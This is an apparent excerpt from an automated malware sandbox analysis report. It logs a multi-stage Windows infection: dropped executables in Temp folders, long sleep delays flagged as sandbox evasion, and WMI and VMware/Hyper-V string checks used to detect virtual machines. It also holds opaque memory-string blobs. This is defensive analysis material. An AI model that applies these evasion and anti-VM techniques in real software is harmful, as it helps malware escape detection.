Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe TID: 7472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe TID: 8996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9036 Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9040 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9028 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8968 Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9048 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9044 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8968 Thread sleep count: 134 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9032 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9052 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9056 Thread sleep time: -48024s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -599675s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -597269s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -596933s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8744 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -596417s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -596128s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595880s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595737s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595611s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595269s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -592613s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -592174s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -591863s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -591362s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -588551s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -587988s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -587538s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -587006s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -586598s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -584013s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -583347s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -582588s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -579810s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -579036s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -578371s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -574082s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -573153s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -572475s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -571559s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -570854s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -570174s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -569384s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -568678s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -291318s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A33B0 FindFirstFileA,FindNextFileA, 9_2_008A33B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008C3B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 9_2_008C3B20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00811F8C FindFirstFileExW, 9_2_00811F8C
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592613
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 588551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 586598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 584013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 583347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 582588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 578371
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 574082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 573153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 572475
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 571559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 569384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 568678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 291318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: d361f35322.exe, 00000024.00000003.2762447424.0000000001447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JwZo/8MwiwHqIvXEAOVpRY7WnVBhrODe/dgRQYX3uczos12TJGMgUcbRf8jrvikd/VczY83oKOZAMzqKgTejI6EDzeg4bDERNuftnqULxoXXPfG6v9krfDbdf0XoQLjCXaLpea2NXecnZXJn9gK/7u4bACHwMWEsF/+YMF5I4GPCRFLE5FKoUgv0RsC+xv1D14mzjXDWhOP4HkVDCCuw0TOg7ZoSe+IcDxF44hzPxp84JxATeOKcTI44gBz6tsBxz8kV3Mr9ySGQd6AQBIufA8mBljGr2c5LvboJrUlkjspoX0E2zmf8Wi7uCKu66bwVcqk7OT/SRzGzI8Fb4KGABhhMsrgTyXTudeKduS4BCrZLqtu5HCGjWWcBWT2zygyOzYKzWCB4Jda5PJQz8Bg1lJo/Rg0HDTxGjUQV41HdqVdyXOqVkn1e8dO8sqbbOolfg2AmVM0VryhWWcGcYcoKpvYpKwQ0TFnhqGI8amAyr3+9rX+lgDhnc2WN9VR7E/PZPX17mOSQ+bU93mgEU2hPoeE4CGTPhOwddnXof5xFfl5co7tcTE3iOHouxpfJr06qt2mtqWrYr3D+gjeU0Eqvi09rsYc3LTTeHa+hFdn7HjKUcFxD7a0pHdlY9wZ6cvN0VG0ObsC25C2riwgNYAv7HbHjH6+S+pQT0NqEUKNKMPsnM9F0i4ZT0ONhHH4K0iLOkQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: MPGPH131.exe, 0000001B.00000002.3350736971.0000000001466000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Dk&Ven_VMware&P
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MPGPH131.exe, 0000001B.00000003.3206691270.0000000008155000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: d361f35322.exe, 00000009.00000003.2770271909.0000000007DE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Jyvdtmr1hw59RWhOyj3UwXomWVCjPU7iAAL3c3FM/H4uVkTgfi6JDDGxDHp+kienAUWJPz/5wh5QcXDIQ1X87mrROIM4IUVCE3UDPzNoQLyeuBsPKfj/TYFb7dkFGQ81dvc+p2qwlquNa2jOGVakMyBrCzkDewYOfdUIh11p6F0oHLCv0NsUS8ZY0jRw/DbooNsRTP2BK6h19WUpMOHvFoPCoDZ8IHMFpXh5CkwG9JydFEPceTHosUyRBi3zBBD/g3Tf32Gl12xC0+pPlLOaaUEZlZ24Pk/SaIIhkdqTYwT6QCTg430gkggK9IFIKEkcRJI7aibSMB2273edRTAMtKguoOZT16EdFeM2cGv/kop+mkMbFyvPrrvz2eFwokISoqKb6FZwS5/IE3CDEHCXZrZh8FjkGUVw3QLPKIJJ+TOKELjAM4pwPDEGj5qybAdY4Rzc/yYNjtjMq2jfPW5A2RMIY9QTUfNYNAem506IjgnR9Nz50Cmv7uO43VloogiHSRaaSCguC00clhiJFRwt+xPvfnKv8JZ0f+dNwvWzS2+SeuLRnowD0yCtF/0zjxjPGOgUEUbMO0WEQgY6RURhirGY7u1EngXnp91Tsk92fomEE6UwZzVFRyo54VfJ9TyRJwZo/8MwiwHqIvXEAOVpRY7WnVBhrODe/dgRQYX3uczos12TJGMgUcbRf8jrvikd/VczY83oKOZAMzqKgTejI6EDzeg4bDERNuftnqULxoXXPfG6v9krfDbdf0XoQLjCXaLpea2NXecnZXJn9gK/7u4bACHwMWEsF/+YMF5I4GPCRFLE5FKoUgv0RsC+xv1D14mzjXDWhOP4HkVDCCuw0TOg7ZoSe+IcDxF44hzPxp84JxATeOKcTI44gBz6tsBxz8kV3Mr9ySGQd6AQBIufA8mBljGr2c5LvboJrUlkjspoX0E2zmf8Wi7uCKu66bwVcqk7OT/SRzGzI8Fb4KGABhhMsrgTyXTudeKduS4BCrZLqtu5HCGjWWcBWT2zygyOzYKzWCB4Jda5PJQz8Bg1lJo/Rg0HDTxGjUQV41HdqVdyXOqVkn1e8dO8sqbbOolfg2AmVM0VryhWWcGcYcoKpvYpKwQ0TFnhqGI8amAyr3+9rX+lgDhnc2WN9VR7E/PZPX17mOSQ+bU93mgEU2hPoeE4CGTPhOwddnXof5xFfl5co7tcTE3iOHouxpfJr06qt2mtqWrYr3D+gjeU0Eqvi09rsYc3LTTeHa+hFdn7HjKUcFxD7a0pHdlY9wZ6cvN0VG0ObsC25C2riwgNYAv7HbHjH6+S+pQT0NqEUKNKMPsnM9F0i4ZT0ONhHH4K0iLOkQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000002.3073575028.0000000001418000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3350736971.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942487367.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2941258327.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940853881.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3350736971.0000000001447000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2943456957.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934755710.0000000001477000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2226894863.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2226894863.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ac861238af.exe, 00000010.00000003.7189145681.0000000000C76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: amert.exe, 00000007.00000003.1859371747.00000000011C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001418000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000;
Source: RageMP131.exe, 0000002E.00000003.2194989877.0000000001011000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001B.00000002.3354975509.0000000008120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
Source: 1CMweaqlKp.exe, 00000000.00000003.1640238021.000000000113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: amert.exe, 00000007.00000003.1866578225.00000000011B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c73
Source: netsh.exe, 00000016.00000003.1948196297.00000284B17C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
Source: MPGPH131.exe, 0000001B.00000002.3350736971.00000000013ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 0000001B.00000003.3207696960.0000000008157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: F9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: MPGPH131.exe, 0000001B.00000002.3350736971.0000000001466000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ABA40470mm
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: MPGPH131.exe, 0000001B.00000003.3248220823.0000000007CD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}jp,w.jp,x.jp,y.jp,z.jp,a.za,b.za,c.za,d.za,e.za,f.za,g.za,h.za,i.za,j.za,k.za,l.za,m.za,n.za,o.za,p.za,q.z
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
